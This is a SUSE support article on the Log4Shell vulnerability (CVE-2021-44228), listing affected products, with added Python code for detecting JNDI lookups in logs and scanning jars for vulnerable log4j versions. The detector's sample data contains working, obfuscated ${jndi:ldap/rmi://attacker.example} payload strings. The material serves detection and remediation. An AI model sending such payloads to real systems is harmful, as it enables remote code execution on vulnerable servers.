Security vulnerability: log4j remote code execution aka log4shell CVE-2021-44228
Article Number: 000020526
Environment
All products
Situation
A 0-day exploit in the log4j Java logging framework was found by Chen Zhaojun of the Alibaba Cloud Security Team. It allows a remote attacker who can get a string of their choosing into a message logged by log4j 2 (for example through a User-Agent header, a username or any other logged request field) to execute arbitrary code: log4j 2 resolves lookups such as ${jndi:ldap://host/path} inside logged messages by default, and the JNDI lookup makes the JVM fetch and load a remote object from the attacker's LDAP or RMI server. No authentication or special configuration is required beyond attacker-controlled input reaching a log call, which makes the vulnerability critical.
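The following is an added detection example, not part of the original SUSE article. It mimics the lookup-substitution rules that attackers abuse to hide the string "jndi:" from naive pattern matching (nested ${lower:j}, ${::-j} and ${env:NaN:-j} fragments, plus URL encoding in web access logs) and flags lines that, after unwrapping, contain a ${jndi:...} lookup. The log lines and the attacker.example host are constructed for the example.

```python
import re
from typing import List, Optional
from urllib.parse import unquote

# Matches the innermost ${...} lookup, i.e. one with no nested "${" or "}" inside.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def resolve_innermost(body: str) -> Optional[str]:
    """Apply the Log4j 2 substitution rules an attacker abuses to hide 'jndi:'.

    Returns the substituted text, or None if the body is itself a JNDI lookup.
    """
    if body.lower().startswith("jndi:"):
        return None
    # ${prefix:key:-default}: a failed lookup falls back to the text after ":-",
    # so ${::-j} and ${env:NaN:-j} both resolve to "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.lower().startswith("upper:"):
        return body[len("upper:"):].upper()
    # Any other lookup (date:, ctx:, sys:, ...) is treated as resolving to nothing;
    # that is good enough for detection and avoids evaluating real lookups.
    return ""


def contains_jndi_lookup(text: str, max_rounds: int = 64) -> bool:
    """True if text contains a ${jndi:...} lookup after unwrapping common obfuscations."""
    s = unquote(text)  # web access logs often carry the payload URL-encoded
    for _ in range(max_rounds):  # bounded so hostile input cannot spin forever
        m = INNERMOST.search(s)
        if not m:
            return False
        replacement = resolve_innermost(m.group(1))
        if replacement is None:
            return True
        s = s[: m.start()] + replacement + s[m.end():]
    return False


def flag_lines(lines: List[str]) -> List[str]:
    """Return the subset of log lines that carry a JNDI lookup."""
    return [line for line in lines if contains_jndi_lookup(line)]


# Constructed sample access-log lines (not real traffic); the first five are hostile.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "-" "${${env:NaN:-j}ndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.10 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    "user=${ctx:user} action=login status=ok",
]

if __name__ == "__main__":
    for line in flag_lines(SAMPLE_LOG_LINES):
        print("JNDI lookup:", line)
```

A plain regex for "jndi:" catches only the first sample line; the other hostile lines only become visible once the nested lookups are resolved the way log4j itself would resolve them, which is why the unwrapping loop, and not the final pattern, is the important part.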
Resolution
SUSE considers log4j versions 2.0 and newer as affected (upstream fixed the issue in 2.15.0; 2.0 through 2.14.1 are vulnerable in their default configuration). log4j 1.2.x does not contain the vulnerable JNDI lookup and is not considered affected by this CVE.
SUSE Linux Enterprise products do not ship log4j 2.x.
SUSE Manager does not ship log4j 2.x.
SUSE Enterprise Storage does not ship log4j 2.x.
SUSE Openstack Cloud embeds log4j2 in the "storm" component, which will receive updates.
SUSE NeuVector product does not ship log4j 2.x.
SUSE Rancher itself is not affected by this vulnerability. The Helm chart for Istio 1.5 provided by Rancher, which is currently deprecated, includes Zipkin and is vulnerable to Log4j. Customers are advised to upgrade to the recent Istio version provided in Cluster Explorer, which does not use Zipkin and is not affected by the vulnerability.
If you deploy your own Java application stacks on SUSE products, please refer to the upstream guidance from the log4j project on fixing and mitigation measures (upgrading log4j-core, or removing the JndiLookup class from log4j-core where an upgrade is not possible).
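Because the SUSE products above do not ship log4j 2.x, the remaining exposure on a system is the log4j-core jars bundled with customer Java applications. The following scanner is an added example, not code from the SUSE article or the log4j project: it walks a directory tree, reads each log4j jar's manifest, and classifies the jar as fixed, vulnerable, mitigated (JndiLookup.class removed, the upstream workaround for versions that cannot be upgraded) or not affected (log4j 1.x). It does not look inside nested jars in WAR/EAR files or shaded fat jars, so a clean result is not a proof of absence. The fixture jars it builds are constructed, empty-bodied archives that only carry the entries the scanner inspects.

```python
import re
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, Optional, Tuple

# The class that performs the JNDI lookup; upstream's mitigation for versions that
# cannot be upgraded is to delete this entry from log4j-core.jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Extract a (major, minor, patch) tuple from a manifest value or a file name."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(x) for x in m.groups(default="0"))


def is_fixed(v: Tuple[int, ...]) -> bool:
    """CVE-2021-44228 is fixed in 2.15.0 (Java 8+), 2.12.2 (Java 7) and 2.3.1 (Java 6)."""
    return v >= (2, 15, 0) or (2, 12, 2) <= v < (2, 13) or (2, 3, 1) <= v < (2, 4)


def inspect_jar(path: Path) -> str:
    """Classify one log4j jar by version and by the presence of JndiLookup.class."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            if m:
                version = parse_version(m.group(1))
    if version is None:
        version = parse_version(path.name)  # fall back to log4j-core-<version>.jar
    if version is None:
        return "unknown version"
    if version[0] < 2:
        return "not affected (log4j 1.x)"  # different code base, no JndiLookup
    if is_fixed(version):
        return "fixed"
    if JNDI_LOOKUP_CLASS not in names:
        return "mitigated (JndiLookup.class removed)"
    return "vulnerable"


def scan_tree(root) -> Dict[str, str]:
    """Scan a directory tree for log4j-core 2.x and log4j 1.x jars."""
    results: Dict[str, str] = {}
    for p in Path(root).rglob("*.jar"):
        if p.name.startswith(("log4j-core-", "log4j-1.")):
            results[p.name] = inspect_jar(p)
    return results


def build_fixtures(root) -> None:
    """Write constructed jars (manifest plus an empty placeholder class entry)."""
    root = Path(root)
    root.mkdir(parents=True, exist_ok=True)

    def write(name: str, version: str, with_jndi: bool) -> None:
        with zipfile.ZipFile(root / name, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF",
                        f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
            if with_jndi:
                zf.writestr(JNDI_LOOKUP_CLASS, b"")  # placeholder, not real bytecode

    write("log4j-core-2.14.1.jar", "2.14.1", True)            # unpatched
    write("log4j-core-2.14.1-stripped.jar", "2.14.1", False)  # class removed with zip -d
    write("log4j-core-2.17.1.jar", "2.17.1", True)            # fixed release
    write("log4j-1.2.17.jar", "1.2.17", False)                # log4j 1.x


def demo() -> Dict[str, str]:
    """Build the fixtures in a temporary directory and scan them."""
    with tempfile.TemporaryDirectory() as d:
        build_fixtures(d)
        return scan_tree(d)


if __name__ == "__main__":
    for name, status in sorted(demo().items()):
        print(f"{name}: {status}")
```

Run it against a real system with scan_tree("/") (or the application directories you care about) and treat "vulnerable" as an upgrade or mitigate-now item; "mitigated" jars should still be upgraded when the application vendor provides a fixed build, since the class removal is a workaround rather than a fix.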